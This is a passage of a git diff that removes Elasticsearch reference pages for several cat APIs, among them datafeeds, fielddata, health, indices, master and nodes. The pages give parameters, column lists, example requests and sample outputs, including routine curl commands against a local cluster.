--------------------------------------------------- -epoch timestamp count -1475868259 15:24:20 121 --------------------------------------------------- -// TESTRESPONSE[s/1475868259 15:24:20/\\d+ \\d+:\\d+:\\d+/ non_json] diff --git a/docs/reference/cat/datafeeds.asciidoc b/docs/reference/cat/datafeeds.asciidoc deleted file mode 100644 index 9c8f9de6c8d..00000000000 --- a/docs/reference/cat/datafeeds.asciidoc +++ /dev/null @@ -1,131 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[cat-datafeeds]] -=== cat {dfeeds} API -++++ -cat {dfeeds} -++++ - -Returns configuration and usage information about {dfeeds}. - -[[cat-datafeeds-request]] -==== {api-request-title} - -`GET /_cat/ml/datafeeds/` + - -`GET /_cat/ml/datafeeds` - -[[cat-datafeeds-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[cat-datafeeds-desc]] -==== {api-description-title} - -{dfeeds-cap} retrieve data from {es} for analysis by {anomaly-jobs}. For more -information, see {ml-docs}/ml-dfeeds.html[{dfeeds-cap}]. - -NOTE: This API returns a maximum of 10,000 jobs. - -[[cat-datafeeds-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[[cat-datafeeds-query-params]] -==== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-datafeeds] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ -If you do not specify which columns to include, the API returns the default -columns. 
If you explicitly specify one or more columns, it returns only the -specified columns. -+ -Valid columns are: - -`assignment_explanation`, `ae`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-datafeeds] - -`buckets.count`, `bc`, `bucketsCount`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count] - -`id`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -`node.address`, `na`, `nodeAddress`::: -The network address of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] - -`node.ephemeral_id`, `ne`, `nodeEphemeralId`::: -The ephemeral ID of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] - -`node.id`, `ni`, `nodeId`::: -The unique identifier of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] - -`node.name`, `nn`, `nodeName`::: -The node name. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] - -`search.bucket_avg`, `sba`, `searchBucketAvg`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-bucket-avg] - -`search.count`, `sc`, `searchCount`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-count] - -`search.exp_avg_hour`, `seah`, `searchExpAvgHour`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-exp-avg-hour] - -`search.time`, `st`, `searchTime`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-time] - -`state`, `s`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=state-datafeed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -[[cat-datafeeds-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _cat/ml/datafeeds?v=true --------------------------------------------------- -// TEST[skip:kibana sample data] - -[source,console-result] ----- -id state buckets.count search.count -datafeed-high_sum_total_sales stopped 743 7 -datafeed-low_request_rate stopped 1457 3 -datafeed-response_code_rates stopped 1460 18 -datafeed-url_scanning stopped 1460 18 ----- -// TESTRESPONSE[skip:kibana sample data] diff --git a/docs/reference/cat/dataframeanalytics.asciidoc b/docs/reference/cat/dataframeanalytics.asciidoc deleted file mode 100644 index 4fea7f5c87e..00000000000 --- a/docs/reference/cat/dataframeanalytics.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[cat-dfanalytics]] -=== cat {dfanalytics} API -++++ -cat {dfanalytics} -++++ - -Returns configuration and usage information about {dfanalytics-jobs}. - - -[[cat-dfanalytics-request]] -==== {api-request-title} - -`GET /_cat/ml/data_frame/analytics/` + - -`GET /_cat/ml/data_frame/analytics` - - -[[cat-dfanalytics-prereqs]] -==== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following -privileges: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. 
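As with the other machine learning cat APIs, a dedicated role only needs
the cluster-level privilege listed above. A minimal sketch, using the
hypothetical role name `dfanalytics_monitor`:

[source,console]
--------------------------------------------------
PUT /_security/role/dfanalytics_monitor
{
  "cluster": [ "monitor_ml" ]
}
--------------------------------------------------
// TEST[skip:illustrative sketch, the role name is a placeholder]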
- - -//// -[[cat-dfanalytics-desc]] -==== {api-description-title} -//// - - -[[cat-dfanalytics-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default] - - -[[cat-dfanalytics-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ -If you do not specify which columns to include, the API returns the default -columns. If you explicitly specify one or more columns, it returns only the -specified columns. -+ -Valid columns are: - -`assignment_explanation`, `ae`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-dfanalytics] - -`create_time`, `ct`, `createTime`::: -(Default) -The time when the {dfanalytics-job} was created. - -`description`, `d`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=description-dfa] - -`dest_index`, `di`, `destIndex`::: -Name of the destination index. - -`failure_reason`, `fr`, `failureReason`::: -Contains messages about the reason why a {dfanalytics-job} failed. - -`id`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics] - -`model_memory_limit`, `mml`, `modelMemoryLimit`::: -The approximate maximum amount of memory resources that are permitted for the -{dfanalytics-job}. - -`node.address`, `na`, `nodeAddress`::: -The network address of the node that the {dfanalytics-job} is assigned to. - -`node.ephemeral_id`, `ne`, `nodeEphemeralId`::: -The ephemeral ID of the node that the {dfanalytics-job} is assigned to. - -`node.id`, `ni`, `nodeId`::: -The unique identifier of the node that the {dfanalytics-job} is assigned to. - -`node.name`, `nn`, `nodeName`::: -The name of the node that the {dfanalytics-job} is assigned to. - -`progress`, `p`::: -The progress report of the {dfanalytics-job} by phase. - -`source_index`, `si`, `sourceIndex`::: -Name of the source index. - -`state`, `s`::: -(Default) -Current state of the {dfanalytics-job}. - -`type`, `t`::: -(Default) -The type of analysis that the {dfanalytics-job} performs. - -`version`, `v`::: -The {es} version number in which the {dfanalytics-job} was created. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-dfanalytics-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _cat/ml/data_frame/analytics?v=true --------------------------------------------------- -// TEST[skip:kibana sample data] - -[source,console-result] ----- -id create_time type state -classifier_job_1 2020-02-12T11:49:09.594Z classification stopped -classifier_job_2 2020-02-12T11:49:14.479Z classification stopped -classifier_job_3 2020-02-12T11:49:16.928Z classification stopped -classifier_job_4 2020-02-12T11:49:19.127Z classification stopped -classifier_job_5 2020-02-12T11:49:21.349Z classification stopped ----- -// TESTRESPONSE[skip:kibana sample data] diff --git a/docs/reference/cat/fielddata.asciidoc b/docs/reference/cat/fielddata.asciidoc deleted file mode 100644 index 1979d8f8625..00000000000 --- a/docs/reference/cat/fielddata.asciidoc +++ /dev/null @@ -1,160 +0,0 @@ -[[cat-fielddata]] -=== cat fielddata API -++++ -cat fielddata -++++ - -Returns the amount of heap memory currently used by the -<> on every data node in the cluster. - - -[[cat-fielddata-api-request]] -==== {api-request-title} - -`GET /_cat/fielddata/` - -`GET /_cat/fielddata` - -[[cat-fielddata-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-fielddata-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Comma-separated list of fields used to limit returned -information. - - -[[cat-fielddata-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-fielddata-api-example]] -==== {api-examples-title} - -//// -Hidden setup snippet to build an index with fielddata so our results are real: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "body": { - "type": "text", - "fielddata":true - }, - "soul": { - "type": "text", - "fielddata":true - }, - "mind": { - "type": "text", - "fielddata":true - } - } - } -} -POST test/_doc?refresh -{ - "body": "some words so there is a little field data", - "soul": "some more words", - "mind": "even more words" -} - -# Perform a search to load the field data -POST test/_search?sort=body,soul,mind --------------------------------------------------- -//// - -[[cat-fielddata-api-example-ind]] -===== Example with an individual field - -You can specify an individual field in the request body or URL path. The -following `fieldata` API request retrieves heap memory size information for the -`body` field. 
- -[source,console] --------------------------------------------------- -GET /_cat/fielddata?v=true&fields=body --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id host ip node field size -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in body 544b --------------------------------------------------- -// TESTRESPONSE[s/544b|480b/\\d+(\\.\\d+)?[tgmk]?b/] -// TESTRESPONSE[s/Nqk-6in[^ ]*/.+/ non_json] - -[[cat-fielddata-api-example-list]] -===== Example with a list of fields - -You can specify a comma-separated list of fields in the request body or URL -path. The following `fieldata` API request retrieves heap memory size -information for the `body` and `soul` fields. - - -[source,console] --------------------------------------------------- -GET /_cat/fielddata/body,soul?v=true --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id host ip node field size -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in body 544b -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in soul 480b --------------------------------------------------- -// TESTRESPONSE[s/544b|480b/\\d+(\\.\\d+)?[tgmk]?b/] -// TESTRESPONSE[s/Nqk-6in[^ ]*/.+/ s/soul|body/\\w+/ non_json] - -The response shows the individual fielddata for the `body` and `soul` fields, -one row per field per node. - -[[cat-fielddata-api-example-all]] -===== Example with all fields in a cluster - -The following `fieldata` API request retrieves heap memory size -information all fields. - -[source,console] --------------------------------------------------- -GET /_cat/fielddata?v=true --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id host ip node field size -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in body 544b -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in mind 360b -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in soul 480b --------------------------------------------------- -// TESTRESPONSE[s/544b|480b|360b/\\d+(\\.\\d+)?[tgmk]?b/] -// TESTRESPONSE[s/Nqk-6in[^ ]*/.+/ s/soul|body|mind/\\w+/ non_json] \ No newline at end of file diff --git a/docs/reference/cat/health.asciidoc b/docs/reference/cat/health.asciidoc deleted file mode 100644 index 53f9371a9b1..00000000000 --- a/docs/reference/cat/health.asciidoc +++ /dev/null @@ -1,145 +0,0 @@ -[[cat-health]] -=== cat health API -++++ -cat health -++++ - -Returns the health status of a cluster, similar to the <> API. - - -[[cat-health-api-request]] -==== {api-request-title} - -`GET /_cat/health` - -[[cat-health-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-health-api-desc]] -==== {api-description-title} - -You can use the cat health API to get the health status of a cluster. - -[[timestamp]] -This API is often used to check malfunctioning clusters. To help you -track cluster health alongside log files and alerting systems, the API returns -timestamps in two formats: - -* `HH:MM:SS`, which is human-readable but includes no date information. -* {wikipedia}/Unix_time[Unix `epoch` time], which is -machine-sortable and includes date information. 
This is useful for cluster -recoveries that take multiple days. - -You can use the cat health API to verify cluster health across multiple nodes. -See <>. - -You also can use the API to track the recovery of a large cluster -over a longer period of time. See <>. - - -[[cat-health-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -`ts` (timestamps):: -(Optional, Boolean) If `true`, returns `HH:MM:SS` and -{wikipedia}/Unix_time[Unix `epoch`] timestamps. Defaults to -`true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-health-api-example]] -==== {api-examples-title} - -[[cat-health-api-example-timestamp]] -===== Example with a timestamp -By default, the cat health API returns `HH:MM:SS` and -{wikipedia}/Unix_time[Unix `epoch`] timestamps. For example: - -[source,console] --------------------------------------------------- -GET /_cat/health?v=true --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -epoch timestamp cluster status node.total node.data shards pri relo init unassign pending_tasks max_task_wait_time active_shards_percent -1475871424 16:17:04 elasticsearch green 1 1 1 1 0 0 0 0 - 100.0% --------------------------------------------------- -// TESTRESPONSE[s/1475871424 16:17:04/\\d+ \\d+:\\d+:\\d+/] -// TESTRESPONSE[s/elasticsearch/[^ ]+/ s/0 -/\\d+ (-|\\d+(\\.\\d+)?[ms]+)/ non_json] - -[[cat-health-api-example-no-timestamp]] -===== Example without a timestamp -You can use the `ts` (timestamps) parameter to disable timestamps. For example: - -[source,console] --------------------------------------------------- -GET /_cat/health?v=true&ts=false --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -cluster status node.total node.data shards pri relo init unassign pending_tasks max_task_wait_time active_shards_percent -elasticsearch green 1 1 1 1 0 0 0 0 - 100.0% --------------------------------------------------- -// TESTRESPONSE[s/elasticsearch/[^ ]+/ s/0 -/\\d+ (-|\\d+(\\.\\d+)?[ms]+)/ non_json] - -[[cat-health-api-example-across-nodes]] -===== Example across nodes -You can use the cat health API to verify the health of a cluster across nodes. -For example: - -[source,sh] --------------------------------------------------- -% pssh -i -h list.of.cluster.hosts curl -s localhost:9200/_cat/health -[1] 20:20:52 [SUCCESS] es3.vm -1384309218 18:20:18 foo green 3 3 3 3 0 0 0 0 -[2] 20:20:52 [SUCCESS] es1.vm -1384309218 18:20:18 foo green 3 3 3 3 0 0 0 0 -[3] 20:20:52 [SUCCESS] es2.vm -1384309218 18:20:18 foo green 3 3 3 3 0 0 0 0 --------------------------------------------------- -// NOTCONSOLE - -[[cat-health-api-example-large-cluster]] -===== Example with a large cluster -You can use the cat health API to track the recovery of a large cluster over a -longer period of time. You can do this by including the cat health API request -in a delayed loop. 
For example: - -[source,sh] --------------------------------------------------- -% while true; do curl localhost:9200/_cat/health; sleep 120; done -1384309446 18:24:06 foo red 3 3 20 20 0 0 1812 0 -1384309566 18:26:06 foo yellow 3 3 950 916 0 12 870 0 -1384309686 18:28:06 foo yellow 3 3 1328 916 0 12 492 0 -1384309806 18:30:06 foo green 3 3 1832 916 4 0 0 -^C --------------------------------------------------- -// NOTCONSOLE - -In this example, the recovery took roughly six minutes, from `18:24:06` to -`18:30:06`. If this recovery took hours, you could continue to monitor the -number of `UNASSIGNED` shards, which should drop. If the number of `UNASSIGNED` -shards remains static, it would indicate an issue with the cluster recovery. \ No newline at end of file diff --git a/docs/reference/cat/indices.asciidoc b/docs/reference/cat/indices.asciidoc deleted file mode 100644 index fd76be527c7..00000000000 --- a/docs/reference/cat/indices.asciidoc +++ /dev/null @@ -1,122 +0,0 @@ -[[cat-indices]] -=== cat indices API -++++ -cat indices -++++ - -Returns high-level information about indices in a cluster, including backing -indices for data streams. - - -[[cat-indices-api-request]] -==== {api-request-title} - -`GET /_cat/indices/` - -`GET /_cat/indices` - -[[cat-indices-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. You must -also have the `monitor` or `manage` <> -for any data stream, index, or index alias you retrieve. - -[[cat-indices-api-desc]] -==== {api-description-title} - -Use the cat indices API to get the following information for each index in a -cluster: - -* Shard count -* Document count -* Deleted document count -* Primary store size -* Total store size of all shards, including shard replicas - -These metrics are retrieved directly from -https://lucene.apache.org/core/[Lucene], which {es} uses internally to power -indexing and search. As a result, all document counts include hidden -<> documents. - -To get an accurate count of {es} documents, use the <> or -<> APIs. - - -[[cat-indices-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[cat-indices-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -`health`:: -+ --- -(Optional, string) Health status used to limit returned indices. Valid values -are: - -* `green` -* `yellow` -* `red` - -By default, the response includes indices of any health status. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-unloaded-segments] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[[pri-flag]] -`pri` (primary shards):: -(Optional, Boolean) If `true`, the response only includes information from -primary shards. Defaults to `false`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - - -[[cat-indices-api-example]] -==== {api-examples-title} - -[[examples]] -[source,console] --------------------------------------------------- -GET /_cat/indices/my-index-*?v=true&s=index --------------------------------------------------- -// TEST[setup:my_index_huge] -// TEST[s/^/PUT my-index-000002\n{"settings": {"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -health status index uuid pri rep docs.count docs.deleted store.size pri.store.size -yellow open my-index-000001 u8FNjxh8Rfy_awN11oDKYQ 1 1 1200 0 88.1kb 88.1kb -green open my-index-000002 nYFWZEO7TUiOjLQXBaYJpA 1 0 0 0 260b 260b --------------------------------------------------- -// TESTRESPONSE[s/\d+(\.\d+)?[tgmk]?b/\\d+(\\.\\d+)?[tgmk]?b/] -// TESTRESPONSE[s/u8FNjxh8Rfy_awN11oDKYQ|nYFWZEO7TUiOjLQXBaYJpA/.+/ non_json] \ No newline at end of file diff --git a/docs/reference/cat/master.asciidoc b/docs/reference/cat/master.asciidoc deleted file mode 100644 index 1f220d6deca..00000000000 --- a/docs/reference/cat/master.asciidoc +++ /dev/null @@ -1,71 +0,0 @@ -[[cat-master]] -=== cat master API -++++ -cat master -++++ - -Returns information about the master node, including the ID, bound IP address, -and name. - - -[[cat-master-api-request]] -==== {api-request-title} - -`GET /_cat/master` - -[[cat-master-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. 
- -[[cat-master-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-master-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/master?v=true --------------------------------------------------- - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id host ip node -YzWoH_2BT-6UjVGDyPdqYg 127.0.0.1 127.0.0.1 YzWoH_2 --------------------------------------------------- -// TESTRESPONSE[s/YzWoH_2.+/.+/ non_json] - -This information is also available via the `nodes` command, but this -is slightly shorter when all you want to do, for example, is verify -all nodes agree on the master: - -[source,sh] --------------------------------------------------- -% pssh -i -h list.of.cluster.hosts curl -s localhost:9200/_cat/master -[1] 19:16:37 [SUCCESS] es3.vm -Ntgn2DcuTjGuXlhKDUD4vA 192.168.56.30 H5dfFeA -[2] 19:16:37 [SUCCESS] es2.vm -Ntgn2DcuTjGuXlhKDUD4vA 192.168.56.30 H5dfFeA -[3] 19:16:37 [SUCCESS] es1.vm -Ntgn2DcuTjGuXlhKDUD4vA 192.168.56.30 H5dfFeA --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/cat/nodeattrs.asciidoc b/docs/reference/cat/nodeattrs.asciidoc deleted file mode 100644 index 84dff43d284..00000000000 --- a/docs/reference/cat/nodeattrs.asciidoc +++ /dev/null @@ -1,126 +0,0 @@ -[[cat-nodeattrs]] -=== cat nodeattrs API -++++ -cat nodeattrs -++++ - -Returns information about custom node attributes. - -[[cat-nodeattrs-api-request]] -==== {api-request-title} - -`GET /_cat/nodeattrs` - -[[cat-nodeattrs-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-nodeattrs-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default columns in the order listed below. If you explicitly specify one or more columns, it only returns the specified columns. - -Valid columns are: - -`node`,`name`:: -(Default) Name of the node, such as `DKDM97B`. - -`host`, `h`:: -(Default) Host name, such as `n1`. - -`ip`, `i`:: -(Default) IP address, such as `127.0.1.1`. - -`attr`, `attr.name`:: -(Default) Attribute name, such as `rack`. - -`value`, `attr.value`:: -(Default) Attribute value, such as `rack123`. - -`id`, `nodeId`:: -ID of the node, such as `k0zy`. - -`pid`, `p`:: -Process ID, such as `13061`. - -`port`, `po`:: -Bound transport port, such as `9300`. 
--- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-nodeattrs-api-example]] -==== {api-examples-title} - -[[cat-nodeattrs-api-ex-default]] -===== Example with default columns - -[source,console] --------------------------------------------------- -GET /_cat/nodeattrs?v=true --------------------------------------------------- -// TEST[s/\?v=true/\?v=true&s=node,attr/] -// Sort the resulting attributes so we can assert on them more easily - -The API returns the following response: - -[source,txt] --------------------------------------------------- -node host ip attr value -... -node-0 127.0.0.1 127.0.0.1 testattr test -... --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.\n$/\n(.+ xpack\\.installed true\n)?\n/] -// TESTRESPONSE[s/\.\.\.\n/(.+ ml\\..+\n)*/ non_json] -// If xpack is not installed then neither ... with match anything -// If xpack is installed then the first ... contains ml attributes -// and the second contains xpack.installed=true - -The `node`, `host`, and `ip` columns provide basic information about each node. -The `attr` and `value` columns return custom node attributes, one per line. - -[[cat-nodeattrs-api-ex-headings]] -===== Example with explicit columns - -The following API request returns the `name`, `pid`, `attr`, and `value` -columns. - -[source,console] --------------------------------------------------- -GET /_cat/nodeattrs?v=true&h=name,pid,attr,value --------------------------------------------------- -// TEST[s/,value/,value&s=node,attr/] -// Sort the resulting attributes so we can assert on them more easily - -The API returns the following response: - -[source,txt] --------------------------------------------------- -name pid attr value -... -node-0 19566 testattr test -... --------------------------------------------------- -// TESTRESPONSE[s/19566/\\d*/] -// TESTRESPONSE[s/\.\.\.\n$/\n(.+ xpack\\.installed true\n)?\n/] -// TESTRESPONSE[s/\.\.\.\n/(.+ ml\\..+\n)*/ non_json] -// If xpack is not installed then neither ... with match anything -// If xpack is installed then the first ... contains ml attributes -// and the second contains xpack.installed=true \ No newline at end of file diff --git a/docs/reference/cat/nodes.asciidoc b/docs/reference/cat/nodes.asciidoc deleted file mode 100644 index 08279d50e5a..00000000000 --- a/docs/reference/cat/nodes.asciidoc +++ /dev/null @@ -1,366 +0,0 @@ -[[cat-nodes]] -=== cat nodes API -++++ -cat nodes -++++ - -Returns information about a cluster's nodes. - -[[cat-nodes-api-request]] -==== {api-request-title} - -`GET /_cat/nodes` - -[[cat-nodes-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-nodes-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -`full_id`:: -(Optional, Boolean) If `true`, return the full node ID. If `false`, return the -shortened node ID. Defaults to `false`. 
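For example, a request that combines `full_id` with an explicit column list might look like the following sketch (illustrative only; the `id`, `name`, and `ip` columns are described under the `h` parameter below):

[source,console]
--------------------------------------------------
GET /_cat/nodes?v=true&full_id=true&h=id,name,ip
--------------------------------------------------
// TEST[skip:editorial sketch, not part of the tested examples]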
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default columns in the order listed below. If you explicitly specify one or more columns, it only returns the specified columns. - -Valid columns are: - -`ip`, `i`:: -(Default) IP address, such as `127.0.1.1`. - -`heap.percent`, `hp`, `heapPercent`:: -(Default) Maximum configured heap, such as `7`. - -`ram.percent`, `rp`, `ramPercent`:: -(Default) Used total memory percentage, such as `47`. - -`file_desc.percent`, `fdp`, `fileDescriptorPercent`:: -(Default) Used file descriptors percentage, such as `1`. - -`node.role`, `r`, `role`, `nodeRole`:: -(Default) Roles of the node. Returned values include `c` (cold node), `d` (data -node), `h` (hot node), `i` (ingest node), `l` (machine learning node), `m` -(master-eligible node), `r` (remote cluster client node), `s` (content node), -`t` ({transform} node), `v` (voting-only node), `w` (warm node) and `-` -(coordinating node only). -+ -For example, `dim` indicates a master-eligible data and ingest node. See -<>. - -`master`, `m`:: -(Default) Indicates whether the node is the elected master node. Returned values -include `*` (elected master) and `-` (not elected master). - -`name`, `n`:: -(Default) Node name, such as `I8hydUG`. - -`id`, `nodeId`:: -ID of the node, such as `k0zy`. - -`pid`, `p`:: -Process ID, such as `13061`. - -`port`, `po`:: -Bound transport port, such as `9300`. - -`http_address`, `http`:: -Bound http address, such as `127.0.0.1:9200`. - -`version`, `v`:: -Elasticsearch version, such as {version}. - -`build`, `b`:: -Elasticsearch build hash, such as `5c03844`. - -`jdk`, `j`:: -Java version, such as `1.8.0`. - -`disk.total`, `dt`, `diskTotal`:: -Total disk space, such as `458.3gb`. - -`disk.used`, `du`, `diskUsed`:: -Used disk space, such as `259.8gb`. - -`disk.avail`, `d`, `disk`, `diskAvail`:: -Available disk space, such as `198.4gb`. - -`disk.used_percent`, `dup`, `diskUsedPercent`:: -Used disk space percentage, such as `47`. - -`heap.current`, `hc`, `heapCurrent`:: -Used heap, such as `311.2mb`. - -`ram.current`,`rc`, `ramCurrent`:: -Used total memory, such as `513.4mb`. - -`ram.max`, `rm`, `ramMax`:: -Total memory, such as `2.9gb`. - -`file_desc.current`, `fdc`, `fileDescriptorCurrent`:: -Used file descriptors, such as `123`. - -`file_desc.max`, `fdm`, `fileDescriptorMax`:: -Maximum number of file descriptors, such as `1024`. - -`cpu`:: -Recent system CPU usage as percent, such as `12`. - -`load_1m`, `l`:: -Most recent load average, such as `0.22`. - -`load_5m`, `l`:: -Load average for the last five minutes, such as `0.78`. - -`load_15m`, `l`:: -Load average for the last fifteen minutes, such as `1.24`. - -`uptime`, `u`:: -Node uptime, such as `17.3m`. - -`completion.size`, `cs`, `completionSize`:: -Size of completion, such as `0b`. - -`fielddata.memory_size`, `fm`, `fielddataMemory`:: -Used fielddata cache memory, such as `0b`. - -`fielddata.evictions`, `fe`, 